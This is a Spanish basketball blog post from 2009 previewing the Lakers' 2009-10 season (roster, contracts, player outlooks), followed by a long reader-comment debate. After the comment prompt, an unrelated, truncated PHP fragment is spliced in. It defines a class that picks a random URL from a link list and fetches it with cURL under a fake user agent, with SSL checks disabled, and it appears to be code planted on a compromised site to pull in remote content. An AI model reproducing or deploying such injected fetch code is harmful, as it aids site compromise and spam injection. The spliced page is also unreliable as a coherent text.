L. A. Lakers 2009-2010: Objetivo Dinastía

27 de September de 2009 por MagicJohnson32

lakersparade

“¡Señoras y señores, con todos ustedes, los campeones de la NBA!” Cuando los jugadores de Los Angeles Lakers salten al parquet del Staples Center para recibir sus anillos en la previa del partido inaugural de la temporada contra los Clippers, serán prácticamente los mismos que lo ganaron en las pasadas Finales contra los Magic. La única cara nueva será la de Ron Artest, jugador del gusto de Phil Jackson y que ocupará el puesto de alero titular que durante la pasada temporada se ganó Trevor Ariza, esencial en los Playoffs y en la consecución del título. La dirección de la franquicia optó sin embargo por jugársela con Artest cuando las negociaciones para renovar a Ariza encallaron. Menos atlético y sin el potencial de Ariza, a Artest se le exigirá que haga valer su experiencia, su dureza defensiva ante jugadores como LeBron o Paul Pierce y una mayor aportación ofensiva. La duda, y de aquí el riesgo de su adquisición, es si asumirá su rol como tercera opción en ataque tras Bryant y Gasol, pero para que esto no suponga un problema los Lakers están pagando 12 millones de dólares a Phil Jackson. El movimiento, renunciar a Ariza de forma tal vez precipitada en favor de Artest, sólo podrá valorarse cuando comprobemos el rendimiento que el neoyorquino dé como Laker y cómo afecta su incorporación a las aspiraciones de los angelinos.

lakersartestEn cualquier caso, cabe considerar que Kupchak cumplió sus deberes veraniegos, no sin ciertos problemas. Si la firma de Artest fue fulgurante, la renovación de Lamar Odom resultó mucho más dramática y no llegó hasta finales de julio, después de una ruptura de las negociaciones por parte del propietario Buss, enfadado tras no recibir respuesta a su primera oferta de 27 millones por 3 años. Buss, egocéntrico y temperamental, sabía sin embargo lo que se hacía: en plena crisis y con muchas franquicias con la mirada y la cartera puestas en el verano de 2010, nadie estaba en condiciones ni dispuesto a ofrecer a Odom cifras similares. El jugador y su agente quisieron jugar duro, insinuando su posible regreso a los Heat. Los Lakers no mordieron el anzuelo y finalmente Odom renovó por cifras similares a las de la oferta inicial, más un cuarto año opcional para el equipo. De esta manera, los Lakers se garantizan un puesto entre la elite de la liga para al menos las próximas dos temporadas con un bloque conformado por Kobe Bryant, Pau Gasol, Andrew Bynum, Odom y Artest, además de Luke Walton y Sasha Vujacic.

Durante la temporada se producirá, muy probablemente, la ampliación del contrato de Bryant, tal vez el último que firme como jugador profesional. Una año más, acabado de cumplir los 31, en plena madurez y tras completar su currículo con el MVP de las Finales, Bryant comandará la nave angelina. Salvo lesiones de jugadores importantes que le obliguen a asumir más responsabilidades, el rendimiento #24 seguirá siendo estelar pero con estadísticas alejadas de las de los candidatos a MVP. El objetivo no es ese: sin nada ya que demostrar al mundo, en su cabeza no habrá otra cosa que obtener su quinto anillo, el que le equipararía a Magic Johnson y a Kareem Abdul-Jabbar como jugadores que más títulos han ganado con la camiseta de los Lakers.
kobefocus

De su mano, por supuesto, iría Derek Fisher, que llegó a la liga el mismo año que Bryant y que ha participado en todos y cada uno de los cuatro títulos obtenidos por la franquicia desde aquel ya lejano 1996. Fish, que en las pasadas Finales volvió a disfrazarse de héroe ocasional con dos triples memorables en el 4º partido, completará nuevamente el backcourt titular. A sus 35 años, Fisher ha acentuado tanto sus defectos (en especial los problemas en defensa ante bases rápidos) como sus cualidades (su confianza para jugarse y anotar tiros importantes y su inteligencia para sacar faltas en ataque), y es de suponer que su fisher3juego mantendrá esta misma línea.

La competencia para la posición de base la ponen Jordan Farmar y Shannon Brown. Durante la temporada pasada, el ex de UCLA perdió por (de)méritos propios la condición de primera rotación exterior en beneficio de Brown, llegado como relleno en el traspaso Radmanovic-Morrison y que gracias a su juego entusiasta y agresivo se convirtió en un habitual en el tramo final de regular season y durante las eliminatorias del Oeste. Farmar afronta su último año de contrato garantizado, su última oportunidad de dar un paso al frente y asegurarse con una buena temporada su futuro en los Lakers. Ha cambiado el dorsal, ha regresado al 1 que vestía en los Bruins, y en sus manos está la posibilidad de tomar el relevo de Fisher. Ahora o nunca.

Otro jugador que decepcionó profundamente la temporada pasada fue Sasha Vujacic. El esloveno ni se aproximó al rendimiento que llevó a los Lakers a firmarle 12 millones por 3 años, y la cosa incluso empeoró en Playoffs, cuando su ansiedad se tradujo en unos porcentajes de acierto ínfimos (26.4%) y en una inevitable  reducción de sus minutos. La actuación de Vujacic tocó fondo con la decepción vivida este verano cuando fue descartado por su selección para el Eurobasket. Ahora debería volver a ejercer el papel de especialista en triples que demostró ser en la 07-08. O él, o bien Adam Morrison, otro que ha de ir necesariamente a mejor en su intento por parecerse al jugador que fue en Gonzaga o, como mínimo, al de su año rookie en los Bobcats, antes de la lesión de ligamentos que le tuvo inactivo una temporada completa. Morrison tendrá a favor su popularidad entre el público (su condición de único jugador paubynumdiabético de la NBA lo convierte en un ejemplo para niños con dicha enfermedad) pero se tendrá que enfrentar a la presión de jugar en un equipo con las máximas aspiraciones donde las oportunidades escasean y el margen de error es mínimo.

El frontcourt titular lo compondrán con toda probabilidad Artest, Gasol y Bynum, con Odom como primer recambio y titular  de plenas garantías en caso de ausencia de uno de los tres anteriores. Esta polivalencia es la gran aportación de Lamar Odom a los Lakers, sumada a su tan indiscutible como imprevisible talento. Tras una temporada de altibajos, discreta y con fases de gran frustración, Odom fue capaz de mostrar su mejor versión en los últimos partidos de la serie contra Denver y en las Finales. Objetivo frecuente de las críticas de prensa y aficionados, la llegada de su íntimo amigo Artest restará presión -y protagonismo- a Lamar Odom. Apuesto a que se siente aliviado.

Si de Artest cabe esperar cualquier cosa -desde que sea el 3 duro, anotador y competitivo que en tantas ocasiones han echado en falta los Lakers, hasta una fuente de desestabilización y problemas en el vestuario-, a Pau Gasol en cambio ya no nos atrevemos a ponerle techo: elevado a la cima del baloncesto FIBA, convertido en el primer jugador en la historia paulokbjfarmque logra el Anillo y el Eurobasket el mismo año, abrumador MVP del torneo de Polonia, campeón o finalista en cada una de las cinco competiciones que ha disputado en los últimos 3 años con los Lakers y con la Selección española… Gasol será de nuevo el faro interior del juego diseñado por Phil Jackson. Si Andrew Bynum se mantiene sano y rinde tal y como lo venía haciendo las dos últimas temporadas antes de lesionarse, habrá que esperar una reducción en los minutos de juego de Gasol, que el año pasado superó incluso a Bryant en este apartado. Por su parte, Bynum, que a principios de la pasada campaña firmó su primer gran contrato, todavía no ha superado su condición como intrigante proyecto de jugador magnífico, con las dudas que imponen sus lesiones y una fortaleza mental cuestionable pero con las credenciales de sus promedios de más de 14 puntos, 8 rebotes y casi 2 tapones en 29 minutos durante los 50 partidos de fase regular que disputó en la 2008-2009. Su definitiva eclosión ha de aportar a los Lakers una mayor fortaleza en la pintura y más motivos para ser optimista de cara al repeat.

Completan la plantilla Luke Walton, Josh Powell y Didier Mbenga. En el caso de Walton, ha de rehacerse de una temporada para olvidar, marcada por los problemas físicos y por algunas fases en las que prácticamente desapareció de la rotación. Sin embargo, su conocimiento del juego y su habilidad para aportar en los pequeños detalles, cosas tan del gusto de Phil Jackson, le garantizan algunos minutos que se incrementarían si volviese a ser el de la 2006-2007. kbpgyouLos casos de Powell y Mbenga son diferentes: se ganaron la renovación gracias a su profesionalidad, su capacidad para sumar en un tiempo de juego extremadamente reducido y, en el caso del africano, a que se ha convertido en un crowd favorite (llenando así el hueco dejado en su momento por Turiaf).

En resumen, los Lakers conservan casi todos los mimbres que les hicieron campeones; la ausencia de Ariza la ha de compensar con creces Artest; y la evolución de Farmar, Morrison y especialmente Bynum aportan un margen de mejora que ha de hacer a este equipo aún mejor. Posiblemente le hará falta ante los refuerzos llevados a cabo por Spurs, Blazers, Celtics, Cavs o Magic, pero el equipo, con Jackson, Bryant y Gasol al frente, parece más que preparado para el reto de renovar título, algo que no consigue ningún equipo desde… los Lakers del three-peat.

Quinteto inicial: Derek Fisher, Kobe Bryant, Ron Artest, Pau Gasol y Andrew Bynum.

Sexto hombre: Lamar Odom.

Pronóstico: Campeones.

Comenta

29 comentarios a esta entrada

  1. Óscar dice:
    #1

    Los Lakers parecen preparados para el asalto a un nuevo título. Al menos, Phil Jackson no prometió en los festejos que en un año volverían a celebrar un anillo, como hizo Pat Riley en su día con el célebre “repeat” y que le supuso una presión extra para logarlo, aunque finalmente así fue.
    Algunos comentarios sobre el análisis:
    * Para mí, pierden con el “cambio” de Artest por Ariza. Seguramente me equivoque, pero bueno. Creo que Trevor hizo una gran temporada y sobre todo en la fase decisiva, teniendo aún mucho margen de mejora por su enorme potencial y su edad. “Ronron” es un recambio extraordinario, con características relativamente similares para lo que necesita el equipo, tiene más experiencia pero quizás no le dará tanto equilibrio ni continuidad en el juego. En cuanto a su comportamiento, no será un problema como ya ha demostrado en HOU, pese a sus excentricidades.
    * La rotación en el juego interior es mejorable. Tendrán que rezar para que no tengan lesiones, sobre todo Bynum. Powell puede seguir aportando, es un jugador cumplidor y muy útil, pero ¿suficiente?. Ilunga-Mbenga lo tendrá de nuevo crudo para ganarse siquiera unos minutillos, pero es verdad que ha rendido cuando ha jugado.
    * En cuanto a Luke Walton, no creo que hiciese una temporada para olvidar, MJ32. Y no se perdió tantos encuentros. Tenemos que saber lo que puede dar cada uno, por sus características. Es un jugador perfecto para el engranaje y estilo de LAL, y siempre aporta, de titular o suplente, que es lo que será este año.
    * Un gran acierto la renovación de Shannon Brown, un jugador tremendo en mi opinión en intensidad y defensa, pero también en ataque mostró buenas cosas cuando tuvo minutos, ganados a pulso. A Vujacic es posible que le queden dos caminos en Los Ángeles: el traspaso o el ostracismo. Cómo se ha desinflado el esloveno.
    * Por último, Odom jugará de nuevo de “4”. Será titular si se lesionan Pau o Bynum, pero no creo que volvamos a verlo de “3”, junto a dos postes.
    P.D. Gracias por empezar a incluir a Portland entre los 4/5 equipos con buenos refuerzos a tener en cuenta. Qué subidón m`ha dao jeje.

      Citar

  2. Asdare dice:
    #2

    Como el año pasado, nos pasaremos toda la temporada discutiendo sobre si Kobe es mejor que Lebron, si a Gasol se le puede considerar una superestrella o no, si Bynum puede jugar sin hacer faltas, si Odom aceptara el puesto de sexto hombre, si Fisher y Phil Jackson ya estan mayores o si Vujacic, Farmar y compañia valen para un equipo NBA, pero la realdiad es que Lakers tienen el mejor equipo y todas las papeletas para volver a llevarse el anillo. Solo hay que mirarlo de este modo: hace 2 años se quedaron a 2 victorias del titulo sin contar con un alero titular decente (acordaos de Radmanovic) y con Bynum lesionado.

    Sobre el cambio Ariza/Artest, pienso que a corto plazo puede incluso salir ganando, o cuando menos no notar la diferencia. Artest es un tio problematico y en algun partido se le ira la cabeza como el año pasado contra los Lakers, pero no le veo reclamando mas protagonismo del que tenia Ariza. Ademas, volviendo a la eliminatoria Rockets/Lakers del año pasado, cuando Artest jugo verdaderamente bien fue junto a Yao. Cuando este se lesiono Artest bajo su rendimiento.

    La unica preocupacion deberia ser el rendimiento de Fisher, tanto en direccion de juego (nula) como en su defensa (a Brooks, Billups y Alstont ni les veia). Francamente, si ahora tengo que imaginar como van a caer los Lakers este año me imagino a Rondo, Parker o Mo Williams rompiendo a Fisher una y otra vez y anotandoles 35 puntos.

    Lo dicho, veo a Lakers como claro favorito pero ya se sabe que esto da muchas vueltas y hay unos cuantos equipos que pueden ganarles si se despistan.

      Citar

  3. Hakeem dice:
    #3

    Varios factores por los que creo que los Lakers no repetirán:
    -El puesto de base es desastroso…Fisher tiene 35 años,Farmar es un cabeza loca y Brown es un escolta de toda la vida,solo que ahora intenta reconvertirse.Sus rivales tienen a Rondo,Parker,Billups,Nelson…
    -Bynum quiere mas protagonismo,Artest quiere mas protagonismo…en fin.
    -Odom baja su rendimiento cada temporada y tiene horchata en las venas.Además,no está comodo jugando de alero,y estando Bynum que jugará mas y Gasol…Bajará su rendimiento.
    -Gasol llega ya habiendose echado un Europeo a sus espaldas…
    -Perkins-Garnett-Pierce-Allen-Rondo con Shedd,Marquis Daniels,Glen Davis…y encima vienen descansados todos.
    -Parker-Mason-Jefferson-Haislip-Duncan con Ginobili,McDyess y el rookie DeJuan Blair que pinta muy bien.Reyes de play-offs y con Jefferson y mas comlementos ahora.Brutal.
    -En el oeste van a tener un camino mucho mas duro y les pueden dar una sorpresa.Encontrarse con Utah o New Orleans en primera ronda es peor que hacerlo con Chicago o Philadelphia…Y luego te puede caer Portland o Denver(en el este los Hawks)…y luego los Spurs(Orlando o Cleveland…)…Llegarian a la final reventados,el oeste es mucho mas duro.
    Apuesto por un Celtics-Spurs este año 🙂

      Citar

  4. Viva_Dirk dice:
    #4

    Bueno Oscar, Walton jugó el año pasado su peor campaña desde que es un hombre de cierta importancia en los Lakers. A parte de perderse 17 partidos, jugó solo 18 minutos, 5 menos que el año anterior, tiró peor y su defensa por momentos fue nula. Se puede decir que fue un año para olvidar.

    El problema del base en defensa para mi es relativo, siempre que no halla un escolta y un alero de buen nivel, Kobe podria encargarse del base(Parker) y Artest del escolta(Ginobili) mientras Fisher coge al menos peligroso. Desde luego que me gustaría que Fisher tuviese ya un recambio de mas garantias, pero no creo que se nos vaya a ir por ahí la temporada.

      Citar

  5. M dice:
    #5

    Quiero ver como se adaptan Artest y Bynm al statu quo del equipo, el año pasado las lesiones impidieron persistentemente lo que parecería un equipo fortísimo al pleno durante tramos de la temporada, pero también impidieron luchas de egos, supongo. Teniend en cuenta que a partir de Kobe vienen los demás, quizá sea más fácil, y Jackson parece solvente en este sentido. Yo tampoco creo que los problemas en el puesto de base les compliquen sobremanera, pero me sorprende que no hayan intentado (bueno, intentado no sé, conseguido), algo de más garantías de lo que tienen.

      Citar

  6. MagicJohnson32 dice:
    #6

    Algunos apuntes sobre los comentarios que habéis hecho. Por partes. Primero, a Oscar:

    – la de Walton fue, sin ningún tipo de duda, una temporada para el olvido. Ojo, yo soy lo más cercano a un fan de Walton que te puedes encontrar (sí, tengo una camiseta suya ¿qué pasa? ;D ), y ya digo en el texto que sólo con su inteligencia ya aporta cosas. Pero fíjate que de los partidos que se perdió, algunos de ellos no fue por lesión sino porque se quedó fuera de las rotaciones. Ya tiene que estar mal Walton para que Jackson no le dé ni un minuto… Y, bueno, como dice Viva_Dirk, basta echar un ojo a sus estadísticas para comprobar que fue su peor año en mucho tiempo. La cuestión es que al final, a raíz del traspaso de Radmanovic, volvió a contar (de hecho paso de no jugar a ser el titular durante algunas semanas) y dio buenos minutos especialmente en la serie contra Denver, defendiendo muy bien a Melo.

    – Te podrá parecer que la rotación interior es mejorable, pero cuando tu frontcourt es Gasol-Artest-Odom-Bynum… buf, se me ocurren pocos de ese nivel en toda la liga. Por mucho que Bynum se haya lesionado las dos últimas temporadas, no es un jugador que se pierda muchos partidos. Fueron dos acciones muy puntuales, fortuitas. En serio, si se te cae un tipo de 90 kilos sobre la rodilla y te la dobla, lo normal es que te lesiones ¿no? Y luego ni Artest ni Gasol ni Odom suelen lesionarse.

    – Odom jugará de lo que haga falta. Será el primer recambio y si un día Artest se carga rápido de faltas, Odom saldrá de 3. Si no, saldrá por Bynum y Pau pasará al puesto de 5. A Phil le gusta que el balón pase por Odom, y eso es más fácil cuando juega de 3. Si la cosa con los bases se pone muy mal, podemos llegar a ver un quinteto Kobe-Artest-Odom-Pau-Bynum.

    P.D.: Hombre, es que los Blazers tienen el potencial para dar mucha guerra. Falta ver cómo se acopla Miller y si Oden es lo que puede llegar a ser, pero han de empezar a contar desde ya.

      Citar

  7. MagicJohnson32 dice:
    #7

    A Hakeem:

    – Sí, el puesto de base es desastroso pero al final Fisher volvió a ser decisivo en el Anillo, y van…

    – ¿Por qué ha de ser un problema que Artest y Bynum quieran más protagonismo y en cambio no lo será para Sheed en los Celtics, Jefferson en los Spurs, Shaq en los Cavs o Carter en los Magic? En los Lakers la jerarquía está muy clara.

    – Odom ha bajado su rendimiento porque ha pasado a 6º hombre. Jugando 8 minutos menos por partido sólo ha bajado 3 puntos y 2 rebotes de media. Dices, además, que no está cómo de 3. En fin, no sé… a Odom le gusta recibir lejos y jugar de cara al aro, raramente postea. Además, eso de que jugará más de 3 porque Bynum jugará más minutos tampoco lo sé. Piensa que ahora está Artest, que se irá a unos 35 minutos. Bynum jugará unos 30-y-pocos. Gasol unos 30-y-muchos. Y Odom jugará unos 10-15 minutos como 3 y otros tantos como 4, en función claro está de las necesidades en cada partido, problemas de faltas, lesiones, ajustes defensivos y demás. Con lo único que no está cómodo Odom es con tener que asumir muchas responsabilidades en ataque, y este año eso no será necesario.

    – Gasol llega con el Europeo a sus espaldas. ¿Es eso un problema? Pues menos mal, porque los Lakers ganaron el anillo después de que Kobe y Gasol jugasen los JJOO. Kobe jugó todos los partidos de la temporada y Pau sólo se perdió 1.

    – Sí, pinta bien el equipo de los Spurs. Pero ni loco cambiaba a Kobe-Pau-Odom-Bynum-Artest por Duncan-Parker-Manu-Jefferson-McDyess.

    – Los Playoffs del Oeste son muy duros. Sí, como cada año. Pero ojo, que en el Este te puede tocar una primera ronda sencilla y punto, a partir de ahí el nivel es tremendo también.

      Citar

  8. kantonyo dice:
    #8

    Siendo conciso, sólo decir, que para mí los Lakers siguen siendo los máximos favoritos al título.

    Trevor Ariza ha demostrado ser un jugador con unas cualidades físicas enormes, añadiendo un plus de compromiso y de concentración a la plantilla de los Lakers. Pero no creo que sea una baja importante, incluso tengo la opinión de que este traspaso le vendrá peor al jugador, que encajaba a la perfección en el equipo californiano y no en Houston, donde con la baja de Yao y las continuas lesiones de McGrady, será el referente del equipo al inicio del campeonato, y tendrá mucho que demostrar.

    Por otra parte la incorporacion de Artest, viene con la duda de si su caracter y comportamiento pueden desestabilizar al equipo. En un equipo con Kobe, Phil y Pau, me temo que no le van a aceptar ninguna tonteria por lo que posiblemente sea un gran acierto su traspaso respecto a ese tema. Ron Artest puede aportar muchísimo a una plantilla que ya es campeona, ya que él, está ansioso de anillo, su aportación defensiva va a ser fundamental.

      Citar

  9. Óscar dice:
    #9

    Magic, no quería contradecir lo que aportabas en el análisis ni polemizar, sólo son apuntes u opiniones. En cuanto a Odom, simplemente creo que no jugará casi nunca de “tres”, como el año pasado. Y en los hombres interiores, digo que si tienen lesiones pueden tener problemas. Es mejorable respecto al “backcourt”, pero no digo que sea mala, al contrario. Ojalá no tengan lesiones.
    Y que la temporada de Walton fue para olvidar, es opinable. Peor que las anteriores sí lo fue, pero creo que cumplió perfectamente con su trabajo, sobre todo en Playoff. Y no lo defiendo por ser hijo de “Big Bill”, jeje.

      Citar

  10. MagicJohnson32 dice:
    #10

    Tranqui Óscar, que aquí estamos para debatir… ¡Hay que mojarse!

    Odom es la mejor alternativa a Artest como alero y la mejor alternativa a Pau como PF. Así que jugará de lo que haga falta. Si Morrison y/o Walton estuviesen muy bien y acaparasen los minutos que Artest deja en el puesto de 3, entonces sí, Odom se limitaría a jugar de 4. Serían buenas noticias para los Lakers.

    Lo de Walton es opinable… Pero si digo que fue un año para olvidar es porque valoro a Walton, espero cosas de él, y la temporada pasada esas cosas apenas se vieron. Ojalá veamos este año una buena versión de Luke.

      Citar

  11. Gallis dice:
    #11

    Un detalle curioso…desde 1989, estos Lakers son el primer equipo que, tras perder una final, ganan el anillo la siguiente temporada.

    Para mi son los favoritos indiscutibles para el anillo y de todos los aspirantes, los que menos dudas presentan.

      Citar

  12. Dantley2 dice:
    #12

    Otro más que piensa que son favoritos. Prefiero a Ariza que a Artest, pero por todo lo que rodea a Artest que es la gran duda. Y con la contestación de Magic a Óscar, de acuerdo con todo excepto con el tema Fisher. Fue desbordado por bases de medio pelo, para mí es ahora mismo un lastre al que meter un triple decisivo no lo hace decisivo. Otra cosa es la discusión que hemos tenido otras veces sobre si Jackson prefiere eso, a tener un base más potente que puede ser que sí, pero a Fisher no lo veo, y a sus suplentes menos.

    Eso sí, favoritos indiscutibles, es muchísimo talento concentrado en un solo equipo. Los Celtics se le acercan pero con más edad y quizá menos hambre.

      Citar

  13. MagicJohnson32 dice:
    #13

    Sobre Fisher…

    – no fue un triple, fueron 2, jaja.
    – ya lo dice Viva, cuando hace falta se ajusta la defensa y Kobe se sitúa sobre el base. En la serie contra Denver (Billups venía de destrozar a Chris Paul y a Kidd en las eliminatorias previas), Kobe defendió a Billups y lo dejó en menos de un 40% de acierto en tiros de campo.

    Por supuesto, Fisher es el eslabón más débil del quinteto, pero mientras Farmar no dé un paso adelante, ahí seguirá. Ah, y no fueron sólo aquellos dos triples, Fisher hizo unas Finales dignísimas.

      Citar

  14. TheDeerHunter dice:
    #14

    Bueno Magic… también es cierto que el desbarajuste que se montó Stan VG con respecto a sus bases fue de tres pares de coj… y ayudaron mucho a la final de Fisher.

    De todas formas Fisher ha sido cuestionado toda la puñetera vida (yo era uno de los que lo hacían al principio… pero después cuando no lo tuvimos se me pasó la tontería) y sin él dudo si hubieramos logrado 2 o 3 de los últimos 4 anillos.

    Las últimas declaraciones de tito Phil hablan específicamente de él… y también de la posibilidad de jugar con Kobe de 1.

    Me llama la atención también que no nombréis a Shannon Brown para cubrir esa posición… es un base “ultra-philjacksoniano”

      Citar

  15. MagicJohnson32 dice:
    #15

    Con base “ultra-philjacksoniano” quieres decir que no es base ¿verdad? 😀

    Mi sensación,y ya lo digo en el análisis, es que esta temporada es la última oportunidad para Farmar y que los Lakers no han perdido toda la fe en él. Tiene cualidades, de hecho tienen muchas más que Fisher, pero cuando mejor jugó tuvo problemas físicos y desde entonces no ha levantado cabeza. Pero es un lanzador decente, infinitamente mejor penetrador que Fisher, y posee una gran potencia de piernas. Shannon Brown partirá como tercera opción, y sin duda Phil recurrirá a él en caso de que Farmar no responda.

    Y ya dije en algún comentario que no sería extraño ver un quinteto con Kobe, Artest, Odom, Pau y Bynum.

      Citar

  16. TheDeerHunter dice:
    #16

    En un quinteto Kobe, Artest, Odom, Pau y Bynum ¿el base sería Odom, no??

      Citar

  17. MagicJohnson32 dice:
    #17

    Con ese quinteto, el base puede ser mi abuela. Y lo cierto es que no hay mucha diferencia entre el Odom de ciertos tramos de la pasada temporada y mi abuela.

      Citar

  18. Dantley2 dice:
    #18

    Pues vaya oportunidad habéis perdido de fichar a Cabezas, que algo mejor que tu abuela debe ser.

    Mola ese Kobe, Artest, Odom, Pau, Bynum. Odom sería el base philjacksiano que una vez pasado de mitad de campo se la pasaría a Artest para que él decida jugada.

      Citar

  19. Jabho dice:
    #19

    Para mi los Lakers son favoritos aunque no claros. Los favoritos son los mismos (LAL, Spurs, Cavs y C´s) y de esos el que menos ha subido el nivel con los cambios.

    Creo que no ganarán aunque me guardo mis razones para mi artículo…

    En lo demás coincido mucho con Magic en que lo del cansancio si no hay lesiones es un milonga, el rendimiento del base bueno, será importante para muchos partidos de la regular pero en los momentos calientes tienen variantes, y me intriga y mucho el rendimiento de Bynum. Para mi es la clave. Y es cierto que las lesiones han sido fortuitas, pero también lo es que no ha sido capaz, por ellas, de demostrarnos cuanto de solvente de es ni de que pasta está hecho en PO….

    Nos vemos en la final, pero aun eso no se, no se…. 😉

      Citar

  20. MagicJohnson32 dice:
    #20

    Os recuerdo que en los 5 partidos anteriores a su lesión, Bynum hizo medias de 26,2 puntos, 13,8 rebotes, 3,2 tapones. Y en los 5 partidos anteriores a su lesión de la temporada anterior, promedió 18,8 puntos, 12,8 rebotes y 2,8 tapones.

    Decidme qué centers hay en la actualidad capaces de hacer eso.

      Citar

  21. Dantley2 dice:
    #21

    A lesionarse cuando mejor rinde te refieres??

      Citar

  22. Viva_Dirk dice:
    #22

    Cinco partidos es muy poco, yo haría referencia a su rendimiento global antes de las lesiones: solvente en ataque y demoledor en defensa. Una de las cosas que mas espero de Bynum es que aprenda a controlar las faltas, los grandes centers siempre han sabido hacer eso.

    En cuanto a centers que puedan hacer eso, a parte D.Howard, creo que el resto que pueden estar al nivel de Bynum tienen problemas de lesiones mas graves que los suyos, Oden o Kaman son dos ejemeplos claros.

      Citar

  23. Txusma dice:
    #23

    Supongo q no te referirás a q Oden puede hacer números cercanos a esos este mismo año.
    A Gasol lo contamos como center o no?

      Citar

  24. Viva_Dirk dice:
    #24

    Si Oden estuviese sano de una vez por todas, creo que 13-13 y 3 tapones no es algo que esté fuera de su alcance ni muchísimo menos. Vamos el potencial de Oden sigue siendo enoooooooorme.

      Citar

  25. MagicJohnson32 dice:
    #25

    Cinco son pocos partidos, sí.
    Mejor 12: en los 12 partidos antes de su lesión, Bynum promedió 20.8 puntos, 8.7 rebotes y 2.1 tapones.

    Lo que digo es que nos quedamos con el Bynum de los Playoffs, y es una imagen distorsionada, porque los dos últimos años alcanzó un nivel espectacular -nivel All Star sin duda- con la mala suerte de que justo entonces se lesionó en ambos casos.

    Y digo que cuando se comenta que otros equipos se han reforzado más, se está obviando el hecho de que los Lakers tuvieron a un Bynum al 50%, si llega, en los últimos Playoffs.

      Citar

  26. aro_pasado_no_newtoniano dice:
    #26

    El tema parece claro…su cuerpo no aguanta estadistica all-star,,cuando está en promedios de humildad,,sufre ataques de humildad en forma de lesiones.

      Citar

  27. aro_pasado_no_newtoniano dice:
    #27

    Entonces,,si alguien grita “MVP, MVP” ¿Es para Gasol?
    ¿Explotará Morrison de una vez?

    Yo he leído que se plantea Phil jugar sin base y Odom en el quintento.

    Gran artículo.

      Citar

  28. Landrusski dice:
    #28

    Menudos cracks estais echos los de este blog…da gusto leer vuestros analisis y luego los comentarios…ya estoy de vuelta por aki…y voy a comentar un pokito de cada analisis…
    Bueno yo veo a lakers este año otra vez campeones y de hecho con mas comodidad que este año…a mi parecer el cambio ariza-artest…ufff xungo…pero incluso veo que pierde un poco laker con el cambio…yo a ariza le veo un potencial enorme y este año se salio,tengo unas ganas enormes de ver como encaja artest…espero que bien…Lo de ganar el anillo mas comodamente lo digo por el hecho de que tienen experiencia…ya lo dije el año pasao…cuando perdieron contra boston la final del 2007-2008 tenia claro que eran favoritos para ganar el anillo al año siguiente y este año que ya saben lo que es ganar incluso les veo mas favoritos. Leo muxos comentarios de que si lebron es el mas desequilibrante y tal…pues perdonen que discrepe y muxo…pero KOBE ES EL MEJOR JUGADOR DEL PLANETA SIN NINGUNA DUDA A EKIVOCARME…si a esto le sumas al posiblemente mejor segundo espada de la liga como es PAU mas un fenomeno como ODOM para mi no hay color…

      Citar

  29. sergio dice:
    #29

    Acabo de saber que Ron Artest relleno (con tilde… no me van xD) una solicitud para trabajar en unos grandes almacenes en su año Rookie porque los empleados tenian un descuento del 50%…. ¬¬

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>